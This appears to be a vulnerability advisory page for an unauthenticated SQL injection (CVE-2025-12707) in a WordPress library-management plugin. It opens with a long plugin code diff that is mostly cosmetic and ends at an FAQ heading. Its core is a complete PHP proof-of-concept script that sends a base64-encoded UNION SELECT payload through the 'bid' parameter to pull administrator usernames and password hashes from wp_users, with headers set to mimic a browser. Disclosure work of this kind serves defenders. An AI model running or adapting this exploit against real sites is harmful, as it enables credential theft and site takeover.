-                <a href="admin.php?page=owt7_library_books&mod=category&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Add New Category", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_books&mod=book&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Add New Book", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_books" class="btn"><?php esc_html_e("List Book", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books&mod=category&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-plus"></span> <?php esc_html_e("Add New Category", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books&mod=book&fn=add&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-plus"></span> <?php esc_html_e("Add New Book", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_books" class="btn"><span class="dashicons dashicons-book"></span> <?php esc_html_e("List Book", "library-management-system"); ?></a>
             </div>
         </div>

@@ -61,16 +72,16 @@
                                     ?>
                                         <a href="admin.php?page=owt7_library_books&mod=category&fn=add&opt=view&id=<?php echo esc_attr(base64_encode($category->id)); ?>&_wpnonce=<?php echo esc_attr($page_nonce); ?>"
                                             title="<?php esc_attr_e('View', 'library-management-system'); ?>" class="action-btn view-btn">
-                                            <span class="dashicons dashicons-visibility"></span>
+
                                         </a>
                                         <a href="admin.php?page=owt7_library_books&mod=category&fn=add&opt=edit&id=<?php echo esc_attr(base64_encode($category->id)); ?>&_wpnonce=<?php echo esc_attr($page_nonce); ?>"
                                             title="<?php esc_attr_e('Edit', 'library-management-system'); ?>" class="action-btn edit-btn">
-                                            <span class="dashicons dashicons-edit"></span>
+
                                         </a>
                                         <a href="javascript:void(0);" title="<?php esc_attr_e('Delete', 'library-management-system'); ?>" class="action-btn delete-btn action-btn-delete"
                                             data-id="<?php echo esc_attr(base64_encode($category->id)); ?>"
                                             data-module="<?php echo esc_attr(base64_encode('category')); ?>">
-                                            <span class="dashicons dashicons-trash"></span>
+
                                         </a>
                                     </td>
                                 </tr>
--- a/library-management-system/admin/views/books/templates/owt7_library_books_list.php
+++ b/library-management-system/admin/views/books/templates/owt7_library_books_list.php
@@ -1,11 +1,20 @@
 <?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */

 if (!empty($params['books']) && is_array($params['books'])) {
     foreach ($params['books'] as $book) {
-        $book_name = esc_html(preg_replace("/\\+'/", "'", $book->name));
-        $category_name = esc_html(preg_replace("/\\+'/", "'", $book->category_name));
-        $bookcase_name = esc_html(preg_replace("/\\+'/", "'", $book->bookcase_name));
-        $section_name = esc_html(preg_replace("/\\+'/", "'", $book->section_name));
+        $book_name = esc_html(preg_replace("/\\+'/", "'", $book->name ?? ''));
+        $category_name = esc_html(preg_replace("/\\+'/", "'", $book->category_name ?? ''));
+        $bookcase_name = esc_html(preg_replace("/\\+'/", "'", $book->bookcase_name ?? ''));
+        $section_name = esc_html(preg_replace("/\\+'/", "'", $book->section_name ?? ''));
         ?>
         <tr>
             <td><?php echo esc_html($book->book_id); ?></td>
@@ -34,16 +43,16 @@
             <td>
                 <a href="admin.php?page=owt7_library_books&mod=book&fn=add&opt=view&id=<?php echo esc_attr(base64_encode($book->id)); ?>&_wpnonce=<?php echo esc_attr($page_nonce); ?>"
                    title="<?php esc_attr_e('View', 'library-management-system'); ?>" class="action-btn view-btn">
-                    <span class="dashicons dashicons-visibility"></span>
+
                 </a>
                 <a href="admin.php?page=owt7_library_books&mod=book&fn=add&opt=edit&id=<?php echo esc_attr(base64_encode($book->id)); ?>&_wpnonce=<?php echo esc_attr($page_nonce); ?>"
                    title="<?php esc_attr_e('Edit', 'library-management-system'); ?>" class="action-btn edit-btn">
-                    <span class="dashicons dashicons-edit"></span>
+
                 </a>
                 <a href="javascript:void(0);" title="<?php esc_attr_e('Delete', 'library-management-system'); ?>"
                    class="action-btn delete-btn action-btn-delete" data-id="<?php echo esc_attr(base64_encode($book->id)); ?>"
                    data-module="<?php echo esc_attr(base64_encode('book')); ?>">
-                    <span class="dashicons dashicons-trash"></span>
+
                 </a>
             </td>
         </tr>
--- a/library-management-system/admin/views/lms/owt7_library_addons.php
+++ b/library-management-system/admin/views/lms/owt7_library_addons.php
@@ -1,7 +1,18 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">
     <div class="owt7_library_about">
         <header class="header">
-            <h1><?php esc_html_e("Library Management System", "library-management-system"); ?><sup>v<?php echo esc_html(LIBRARY_MANAGEMENT_SYSTEM_VERSION); ?></sup></h1>
+            <h1><?php esc_html_e("Library Management System", "library-management-system"); ?><sup>v<?php echo esc_html(LIBMNS_VERSION); ?></sup></h1>
         </header>

         <section class="introduction">
@@ -125,7 +136,7 @@
         <section class="cta">
             <h2><?php esc_html_e("Get Started with Our Basic LMS Pro Plugin", "library-management-system"); ?></h2>
             <p><?php esc_html_e("Experience the future of library management today. Download our LMS plugin and transform the way you manage your library.", "library-management-system"); ?></p>
-            <a href="<?php echo esc_url(LIBRARY_BUY_PRO_VERSION_LINK); ?>" target="_blank" class="cta-btn"><?php esc_html_e("Buy Basic Premium Version", "library-management-system"); ?> <?php echo esc_html(LIBRARY_MANAGEMENT_SYSTEM_VERSION); ?></a>
+            <a href="<?php echo esc_url(LIBMNS_BUY_PRO_VERSION_LINK); ?>" target="_blank" class="cta-btn"><?php esc_html_e("Buy Basic Premium Version", "library-management-system"); ?> <?php echo esc_html(LIBMNS_VERSION); ?></a>
         </section>
     </div>
 </div>
--- a/library-management-system/admin/views/lms/owt7_library_free_vs_pro.php
+++ b/library-management-system/admin/views/lms/owt7_library_free_vs_pro.php
@@ -1,7 +1,18 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">
     <div class="owt7_library_free_vs_pro">
         <header class="header">
-            <h1><?php esc_html_e("Library Management System", "library-management-system"); ?><sup class="premium"><?php esc_html_e("Free Vs Pro", "library-management-system"); ?></sup><sup>v<?php echo esc_html(LIBRARY_MANAGEMENT_SYSTEM_VERSION); ?></sup></h1>
+            <h1><?php esc_html_e("Library Management System", "library-management-system"); ?><sup class="premium"><?php esc_html_e("Free Vs Pro", "library-management-system"); ?></sup><sup>v<?php echo esc_html(LIBMNS_VERSION); ?></sup></h1>
         </header>

         <section class="introduction">
@@ -17,12 +28,12 @@
                 <div class="comparison-column">
                     <h2 class="comparison-title"><?php esc_html_e("Free Version", "library-management-system"); ?></h2>
                     <ul class="feature-list">
-                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage Categories (Up to ".(base64_decode(LMS_FREE_VERSION_LIMIT) - 10).")", "library-management-system"); ?></li>
-                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage Bookcases (Up to ".(base64_decode(LMS_FREE_VERSION_LIMIT) - 10).")", "library-management-system"); ?></li>
+                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage Categories (Up to ".(base64_decode(LIBMNS_FREE_VERSION_LIMIT) - 10).")", "library-management-system"); ?></li>
+                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage Bookcases (Up to ".(base64_decode(LIBMNS_FREE_VERSION_LIMIT) - 10).")", "library-management-system"); ?></li>
                         <li><span class="icon">✔️</span> <?php esc_html_e("Manage Sections", "library-management-system"); ?></li>
-                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage Books (Up to ".base64_decode(LMS_FREE_VERSION_LIMIT).")", "library-management-system"); ?></li>
-                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage User Branches (Up to ".(base64_decode(LMS_FREE_VERSION_LIMIT) - 10).")", "library-management-system"); ?></li>
-                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage LMS Users (Up to ".base64_decode(LMS_FREE_VERSION_LIMIT).")", "library-management-system"); ?></li>
+                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage Books (Up to ".base64_decode(LIBMNS_FREE_VERSION_LIMIT).")", "library-management-system"); ?></li>
+                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage User Branches (Up to ".(base64_decode(LIBMNS_FREE_VERSION_LIMIT) - 10).")", "library-management-system"); ?></li>
+                        <li><span class="icon">✔️</span> <?php esc_html_e("Manage LMS Users (Up to ".base64_decode(LIBMNS_FREE_VERSION_LIMIT).")", "library-management-system"); ?></li>
                         <li><span class="icon">✔️</span> <?php esc_html_e("Borrow a Single Book", "library-management-system"); ?></li>
                         <li><span class="icon">✔️</span> <?php esc_html_e("Return Books", "library-management-system"); ?></li>
                         <li><span class="icon">✔️</span> <?php esc_html_e("Track Book Transactions and History", "library-management-system"); ?></li>
@@ -63,7 +74,7 @@
         <section class="cta">
             <h2><?php esc_html_e("Get Started with Our Basic LMS Pro Plugin", "library-management-system"); ?></h2>
             <p><?php esc_html_e("Experience the future of library management today. Download our LMS plugin and transform the way you manage your library.", "library-management-system"); ?></p>
-            <a href="<?php echo esc_url(LIBRARY_BUY_PRO_VERSION_LINK); ?>" target="_blank" class="cta-btn"><?php esc_html_e("Buy Basic Premium Version", "library-management-system"); ?> <?php echo esc_html(LIBRARY_MANAGEMENT_SYSTEM_VERSION); ?></a>
+            <a href="<?php echo esc_url(LIBMNS_BUY_PRO_VERSION_LINK); ?>" target="_blank" class="cta-btn"><?php esc_html_e("Buy Basic Premium Version", "library-management-system"); ?> <?php echo esc_html(LIBMNS_VERSION); ?></a>
         </section>
     </div>
 </div>
--- a/library-management-system/admin/views/owt7_library_dashboard.php
+++ b/library-management-system/admin/views/owt7_library_dashboard.php
@@ -1,7 +1,18 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="jumbotron">
-        <h1><?php esc_html_e("Welcome to Library Management System", "library-management-system"); ?><sup class="premium"><?php esc_html_e("Free", "library-management-system"); ?></sup><sup>v<?php echo esc_html(LIBRARY_MANAGEMENT_SYSTEM_VERSION); ?></sup></h1>
+        <h1><?php esc_html_e("Welcome to Library Management System", "library-management-system"); ?><sup class="premium"><?php esc_html_e("Free", "library-management-system"); ?></sup><sup>v<?php echo esc_html(LIBMNS_VERSION); ?></sup></h1>
     </div>

     <div class="lms-dashboard card-container">
--- a/library-management-system/admin/views/settings/modals/owt7_mdl_country_settings.php
+++ b/library-management-system/admin/views/settings/modals/owt7_mdl_country_settings.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <!-- The Modal -->
 <div id="owt7_lms_mdl_settings" class="modal">
     <div class="modal-content">
--- a/library-management-system/admin/views/settings/modals/owt7_mdl_late_fine_settings.php
+++ b/library-management-system/admin/views/settings/modals/owt7_mdl_late_fine_settings.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <!-- The Modal -->
 <div id="owt7_lms_mdl_settings" class="modal">
     <div class="modal-content">
--- a/library-management-system/admin/views/settings/owt7_library_country_settings.php
+++ b/library-management-system/admin/views/settings/owt7_library_country_settings.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_lms_settings">
@@ -69,7 +80,7 @@
     <?php
     ob_start();
     $fileName = "owt7_mdl_country_settings";
-    include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . "admin/views/settings/modals/{$fileName}.php";
+    include_once LIBMNS_PLUGIN_DIR_PATH . "admin/views/settings/modals/{$fileName}.php";
     $template = ob_get_contents();
     ob_end_clean();
     echo $template;
--- a/library-management-system/admin/views/settings/owt7_library_late_fine_settings.php
+++ b/library-management-system/admin/views/settings/owt7_library_late_fine_settings.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_lms_settings">
@@ -71,7 +82,7 @@
     <?php
     ob_start();
     $fileName = "owt7_mdl_late_fine_settings";
-    include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . "admin/views/settings/modals/{$fileName}.php";
+    include_once LIBMNS_PLUGIN_DIR_PATH . "admin/views/settings/modals/{$fileName}.php";
     $template = ob_get_contents();
     ob_end_clean();
     echo $template;
--- a/library-management-system/admin/views/settings/owt7_library_settings.php
+++ b/library-management-system/admin/views/settings/owt7_library_settings.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">
     <div class="page-header">
         <div class="breadcrumb">
--- a/library-management-system/admin/views/settings/owt7_library_shortcodes_settings.php
+++ b/library-management-system/admin/views/settings/owt7_library_shortcodes_settings.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="owt7_lms_settings">
--- a/library-management-system/admin/views/transactions/owt7_library_books_borrow.php
+++ b/library-management-system/admin/views/transactions/owt7_library_books_borrow.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="lms-borrow-books">
@@ -9,9 +20,9 @@
                 // Generate the nonce for the actions
                 $page_nonce = wp_create_nonce('owt7_manage_transactions_page_nonce');
             ?>
-                <a href="admin.php?page=owt7_library_transactions" class="btn"><?php esc_html_e("Book(s) Borrow History", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=return&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Book(s) Return", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=return-history&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Book(s) Return History", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_transactions" class="btn"><span class="dashicons dashicons-clock"></span> <?php esc_html_e("Book(s) Borrow History", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=return&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-undo"></span> <?php esc_html_e("Book(s) Return", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=return-history&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-backup"></span> <?php esc_html_e("Book(s) Return History", "library-management-system"); ?></a>
             </div>
         </div>

--- a/library-management-system/admin/views/transactions/owt7_library_books_return.php
+++ b/library-management-system/admin/views/transactions/owt7_library_books_return.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="lms-return-books">
--- a/library-management-system/admin/views/transactions/owt7_library_books_return_history.php
+++ b/library-management-system/admin/views/transactions/owt7_library_books_return_history.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="lms-borrow-history">
@@ -68,7 +79,7 @@
                 <tbody id="owt7_lms_tbl_return_list">
                     <?php
                         ob_start();
-                        include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . 'admin/views/transactions/templates/owt7_library_return_list.php';
+                        include_once LIBMNS_PLUGIN_DIR_PATH . 'admin/views/transactions/templates/owt7_library_return_list.php';
                         $template = ob_get_contents();
                         ob_end_clean();
                         echo $template;
--- a/library-management-system/admin/views/transactions/owt7_library_books_transactions.php
+++ b/library-management-system/admin/views/transactions/owt7_library_books_transactions.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="lms-borrow-history">
@@ -12,9 +23,9 @@
                 $page_nonce = wp_create_nonce('owt7_manage_transactions_page_nonce');
             ?>
             <div class="page-actions">
-                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=borrow&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Borrow a Book", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=return&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Book(s) Return", "library-management-system"); ?></a>
-                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=return-history&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><?php esc_html_e("Book(s) Return History", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=borrow&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-book-alt"></span> <?php esc_html_e("Borrow a Book", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=return&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-undo"></span> <?php esc_html_e("Book(s) Return", "library-management-system"); ?></a>
+                <a href="admin.php?page=owt7_library_transactions&mod=books&fn=return-history&_wpnonce=<?php echo esc_attr($page_nonce); ?>" class="btn"><span class="dashicons dashicons-backup"></span> <?php esc_html_e("Book(s) Return History", "library-management-system"); ?></a>
             </div>
         </div>

@@ -72,7 +83,7 @@
                 <tbody id="owt7_lms_tbl_borrow_list">
                     <?php
                         ob_start();
-                        include_once LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_DIR_PATH . 'admin/views/transactions/templates/owt7_library_borrow_list.php';
+                        include_once LIBMNS_PLUGIN_DIR_PATH . 'admin/views/transactions/templates/owt7_library_borrow_list.php';
                         $template = ob_get_contents();
                         ob_end_clean();
                         echo $template;
--- a/library-management-system/admin/views/transactions/templates/owt7_library_borrow_list.php
+++ b/library-management-system/admin/views/transactions/templates/owt7_library_borrow_list.php
@@ -1,4 +1,14 @@
-<?php
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+
 if (!empty($params['borrows']) && is_array($params['borrows'])) {
     foreach ($params['borrows'] as $borrow) {
         ?>
@@ -44,7 +54,7 @@
                     <a href="javascript:void(0);" title="<?php esc_attr_e('Delete', 'library-management-system'); ?>"
                         class="action-btn delete-btn action-btn-delete" data-id="<?php echo esc_attr(base64_encode($borrow->id)); ?>"
                         data-module="<?php echo esc_attr(base64_encode('book_borrow')); ?>">
-                        <span class="dashicons dashicons-trash"></span>
+
                     </a>
                 <?php } ?>
             </td>
--- a/library-management-system/admin/views/transactions/templates/owt7_library_return_list.php
+++ b/library-management-system/admin/views/transactions/templates/owt7_library_return_list.php
@@ -1,4 +1,14 @@
-<?php
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+
     if(!empty($params['returns']) && is_array($params['returns'])){
         foreach($params['returns'] as $return){
             ?>
@@ -41,7 +51,7 @@
                 <a href="javascript:void(0);" title='<?php esc_attr_e("Delete", "library-management-system"); ?>'
                     class="action-btn delete-btn action-btn-delete" data-id="<?php echo esc_attr(base64_encode($return->id)) ?>"
                     data-module="<?php echo esc_attr(base64_encode('book_return')); ?>">
-                    <span class="dashicons dashicons-trash"></span>
+
                 </a>
             <?php } ?>
         </td>
--- a/library-management-system/admin/views/users/owt7_library_add_branch.php
+++ b/library-management-system/admin/views/users/owt7_library_add_branch.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">

     <div class="lms-add-branch">
--- a/library-management-system/admin/views/users/owt7_library_add_user.php
+++ b/library-management-system/admin/views/users/owt7_library_add_user.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">
     <div class="lms-add-user">
         <div class="page-header">
@@ -133,9 +144,9 @@
                         <?php if(!empty($params['user']['profile_image'])){ ?>
                             <img src="<?php echo esc_url($params['user']['profile_image']); ?>" id="owt7_library_image_preview"/>
                         <?php }else{ ?>
-                            <img src="<?php echo esc_url(LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_URL . 'admin/images/default-user-image.png'); ?>" id="owt7_library_image_preview"/>
+                            <img src="<?php echo esc_url(LIBMNS_PLUGIN_URL . 'admin/images/default-user-image.png'); ?>" id="owt7_library_image_preview"/>
                         <?php } ?>
-                        <input type="hidden" value="<?php echo esc_url(isset($params['user']['profile_image']) ? $params['user']['profile_image'] : LIBRARY_MANAGEMENT_SYSTEM_PLUGIN_URL . 'admin/images/default-user-image.png'); ?>" name="owt7_profile_image" id="owt7_image_url" />
+                        <input type="hidden" value="<?php echo esc_url(isset($params['user']['profile_image']) ? $params['user']['profile_image'] : LIBMNS_PLUGIN_URL . 'admin/images/default-user-image.png'); ?>" name="owt7_profile_image" id="owt7_image_url" />
                     </div>
                 </div>
                 <?php if(isset($params['action']) && $params['action'] == 'view'){ }else{ ?>
--- a/library-management-system/admin/views/users/owt7_library_list_branch.php
+++ b/library-management-system/admin/views/users/owt7_library_list_branch.php
@@ -1,3 +1,14 @@
+<?php
+/**
+ * @link       https://onlinewebtutorblog.com
+ * @since      3.3
+ * @package    Library_Management_System
+ * @subpackage Library_Management_System/admin
+ * @copyright  Copyright (c) 2026, Online Web Tutor
+ * @license    GPL-2.0+ https://www.gnu.org/licenses/gpl-2.0.html
+ * @author     Online Web Tutor
+ */
+?>
 <div class="owt7-lms">
     <div class="lms-list-branch">
         <div class="page-header">
@@ -53,16 +64,16 @@
                                     <td>
                                         <a href="admin.php?page=owt7_library_users&mod=branch&fn=add&opt=view&id=<?php echo esc_attr(base64_encode($branch->id)); ?>&_wpnonce=<?php echo esc_attr($page_nonce); ?>"
                                             title="<?php esc_html_e("View", "library-management-system"); ?>" class="action-btn view-btn">
-

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-12707 - Library Management System <= 3.2.1 - Unauthenticated SQL Injection

<?php

$target_url = "http://vulnerable-site.com/wp-library-books/";

// SQL injection payload to extract admin username and password hash
// The payload uses UNION SELECT to retrieve data from wp_users table
$sql_payload = "' UNION SELECT user_login,user_pass FROM wp_users--";

// Base64 encode the payload as required by the vulnerable parameter
$encoded_payload = base64_encode($sql_payload);

// Construct the full URL with malicious bid parameter
$attack_url = $target_url . "?bid=" . urlencode($encoded_payload);

// Initialize cURL session
$ch = curl_init();

// Set cURL options
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Add headers to mimic legitimate browser request
$headers = [
    'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
    'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Accept-Language: en-US,en;q=0.5',
    'Connection: keep-alive',
];
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

// Execute the request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);

// Check for errors
if (curl_errno($ch)) {
    echo "cURL Error: " . curl_error($ch) . "n";
} else {
    echo "HTTP Status Code: " . $http_code . "n";
    echo "Response Length: " . strlen($response) . " bytesnn";
    
    // Parse response for extracted data
    // The SQL injection attempts to extract user_login and user_pass columns
    // Look for these values in the HTML response
    if (strpos($response, 'user_login') !== false || strpos($response, 'user_pass') !== false) {
        echo "Potential SQL injection successful! Check response for extracted data.n";
        
        // Extract and display relevant portions of response
        $lines = explode("n", $response);
        foreach ($lines as $line) {
            if (preg_match('/admin|user|pass|hash|md5|sha/i', $line)) {
                echo "Found relevant line: " . htmlspecialchars(substr($line, 0, 200)) . "n";
            }
        }
    } else {
        echo "No obvious SQL injection results found in response.n";
        echo "The site may not be vulnerable or the payload needs adjustment.n";
    }
}

// Clean up
curl_close($ch);

?>

Frequently Asked Questions

What is CVE-2025-12707?
Understanding the vulnerability
